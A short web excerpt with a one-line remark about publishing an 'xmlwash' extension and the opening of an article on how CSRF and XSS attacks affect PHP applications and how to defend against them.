This article finally pushed me to write the missing doc and publish the xmlwash extension
Of all the vulnerabilities affecting web applications, especially those written in PHP, Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) are by far the most prevalent. In many instances, developers downplay the severity of these threats and fail to take preventative action.
In this article, we will show you how CSRF and XSS work and how to defend against them. To dispel the myths about these attacks, I will assume the role of a hacker and show how the supposedly harmless injection of tiny bits of HTML can perform amazing things, from stealing the user's identity to a completely transparent rewrite of site content.